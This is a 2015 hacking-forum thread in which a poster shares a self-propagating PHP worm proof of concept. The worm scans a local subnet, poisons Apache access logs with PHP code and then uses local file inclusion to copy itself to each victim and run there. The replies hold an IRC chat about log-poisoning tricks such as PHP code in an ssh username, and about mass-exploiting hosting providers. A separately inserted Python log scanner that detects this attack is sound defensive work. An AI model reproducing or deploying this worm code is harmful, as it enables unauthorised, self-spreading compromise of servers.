php log worm POC for giggles

Post by MadM0use on Wed Jun 03, 2015 10:34 pm

I am too lazy to do a write-up for this post, and I don't feel bad because the idea is simple as fuck :P
If you have any questions, please feel free to ask them here, and I will be glad to answer them.
If you have any criticisms, I don't care, this is a toy :P

Code:
<?php
// ----------------------------------------------------------------------------
// "THE BEER-WARE LICENSE" (Revision 43):
// <aaronryool@gmail.com> wrote this file. As long as you retain this notice you
// can do whatever you want with this stuff. If we meet some day, and you think
// this stuff is worth it, you can buy me a beer in return Aaron R. Yool
// ----------------------------------------------------------------------------
// DISCLAIMER:
// I MadMouse (Aaron R. Yool), am not responsible for the misuse of, (or any use thereof)
// of this software. Use this software at your own risk, and do not blame me for your
// stupidity, as I am not responsible for the actions taken by others. I have my own
// stupidity to be responsible for. lol
   
function scan_for_life()
{
   while(true)
   {
      $host = "192.168.1.".rand(1,255);
      $socket = stream_socket_client("tcp://$host:80", $errno, $errorMessage);
      if ($socket === false) continue;
      else
      {
         fwrite($socket, "GET /index.php?page=/var/log/apache2/access.log HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: close\r\n\r\n");
         $response = stream_get_contents($socket);
         if(strpos($response,"HTTP/1.1 404 Not Found") !== false)
         {
            fclose($socket);
            continue;
         }
         elseif(strpos($response,"Not Found") !== false)
         {
            fclose($socket);
            continue;
         }
      }
      fclose($socket);
      break;
   }
   echo "Host: ".$host." under fire.\n";
   return $host;
}

function send_payload($host)
{
   $socket = stream_socket_client("tcp://$host:80", $errno, $errorMessage);
   if ($socket === false) return false;
   fwrite($socket, "GET /<?php file_put_contents('logwrm.php',base64_decode('".base64_encode(php_strip_whitespace("logwrm.php"))."'));exec(base64_decode('".base64_encode("php logwrm.php > /dev/null &")."')); ?> HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: close\r\n\r\n");
   fclose($socket);
   return true;
}

function run_payload($host)
{
   file_get_contents("http://".$host."/index.php?page=/var/log/apache2/access.log");
}

while(true)
{
   echo "\nScanning for a victim\n";
   $victim = scan_for_life();
   sleep(1);
   echo "Sending payload\n";
   if(!send_payload($victim)) continue;
   sleep(1);
   run_payload($victim);
   echo "PWNED!!!\n";
}

?>
const char main[]="\xeb\xfe -> A fully functional program in C";

<@MadMouse> i am forgot what i was doing today but i had motivation and a distinct plan when i woke up stoned right now

http://pastebin.com/FnwUG5KS
Books:
http://goo.gl/muPm3d
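
A defender's view of the two requests the PoC above sends (a PHP tag written into the access log, then a `page=` include of that log), as an added example that is not part of the original post: a Python pass over Apache access-log lines that flags both. The sample lines, addresses and finding names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Apache common/combined log line: client, [time], "request line", status, size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>.*)" (?P<status>\d{3}) \S+')
PHP_TAG = re.compile(r'<\?(php|=)', re.I)                        # PHP open tag in the request
LOG_PATH = re.compile(r'/var/log/|(access|error)[._]log', re.I)  # parameter names a log file

def classify(line):
    """Return (client_ip, set_of_findings) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = m['req'].split(' ')
    # The target may itself contain spaces, so take everything between method and protocol.
    target = ' '.join(parts[1:-1]) if len(parts) >= 3 else m['req']
    findings = set()
    if PHP_TAG.search(unquote(target)):
        findings.add('php-tag')
    query = target.partition('?')[2]
    if any(LOG_PATH.search(value) for _, value in parse_qsl(query)):
        findings.add('log-include')
    return m['ip'], findings

def scan(lines):
    """Flag poisoning requests and log-path includes, noting includes that follow poisoning."""
    poisoned, alerts = False, []
    for n, line in enumerate(lines, 1):
        hit = classify(line)
        if hit is None:
            continue
        ip, findings = hit
        if 'php-tag' in findings:
            poisoned = True
            alerts.append((n, ip, 'poison'))
        if 'log-include' in findings:
            alerts.append((n, ip, 'include-after-poison' if poisoned else 'include-probe'))
    return alerts

# Constructed sample lines (documentation addresses, placeholder instead of a payload).
SAMPLE = [
    '192.0.2.10 - - [03/Jun/2015:22:30:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '192.0.2.77 - - [03/Jun/2015:22:31:10 +0000] "GET /index.php?page=/var/log/apache2/access.log HTTP/1.1" 200 4096',
    '192.0.2.77 - - [03/Jun/2015:22:31:11 +0000] "GET /<?php PLACEHOLDER ?> HTTP/1.1" 404 209',
    '192.0.2.77 - - [03/Jun/2015:22:31:12 +0000] "GET /index.php?page=%2Fvar%2Flog%2Fapache2%2Faccess.log HTTP/1.1" 200 8192',
]

if __name__ == '__main__':
    for alert in scan(SAMPLE):
        print(alert)
```

Detection only narrows the window; the fix is on the application side, where the `page` parameter should select from a fixed allowlist of templates instead of being passed to an include, and log files should not be readable by the account PHP runs as.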


Re: php log worm POC for giggles

Post by Turn on Thu Jun 04, 2015 5:35 am

Thanks for crediting me on this.....
Social Engineering:
<cen> .lua print ('Tsyn 9.47.-u 3 12 5')
* slickery has quit (User has been banned from HackThisSite (Attempting to use a SpyBot))
* cen has quit (User has been banned from HackThisSite (Attempting to use a SpyBot))


Re: php log worm POC for giggles

Post by MadM0use on Thu Jun 04, 2015 2:47 pm

Turn wrote: Thanks for crediting me on this.....

OH SHIT, my bad lol,


8:52 PM <madmouse> are you talking log flooding?
8:52 PM <project1010> Putting the admin password in plain text then uploading it to the web?
8:52 PM <Turn> In the event that the logs are being thrown up and code execution from PHP is possible
8:52 PM <Turn> Generate log errors with PHP code
8:52 PM <madmouse> hmmm, never thought to do that
8:52 PM <Turn> Like: ssh '<?php echo("pwned"); ?>'@site.com
8:53 PM <Turn> would be in the ssh log
8:53 PM <Turn> if it's on the site, that code will execute
8:53 PM <madmouse> true that
8:53 PM <madmouse> and i have seen hosting services with logs in decompressed form in the root of the web directory
8:53 PM <madmouse> wow, to pwn or not to pwn all night is the question now lol
8:53 PM <Turn> all night?
8:54 PM <Turn> Should be like a few seconds
8:54 PM <madmouse> im talking masses of them
8:54 PM <madmouse> lol
8:54 PM <Turn> Oh
8:54 PM <Turn> :D
8:54 PM <madmouse> i know of several web hosting services that are definitely vulnerable to this lol
8:54 PM <madmouse> and that is just about the easiest thing to script into a php worm i have heard of
8:54 PM <madmouse> time for a POC



I had it saved and was so feverish with this illness I forgot xD I love you bro lol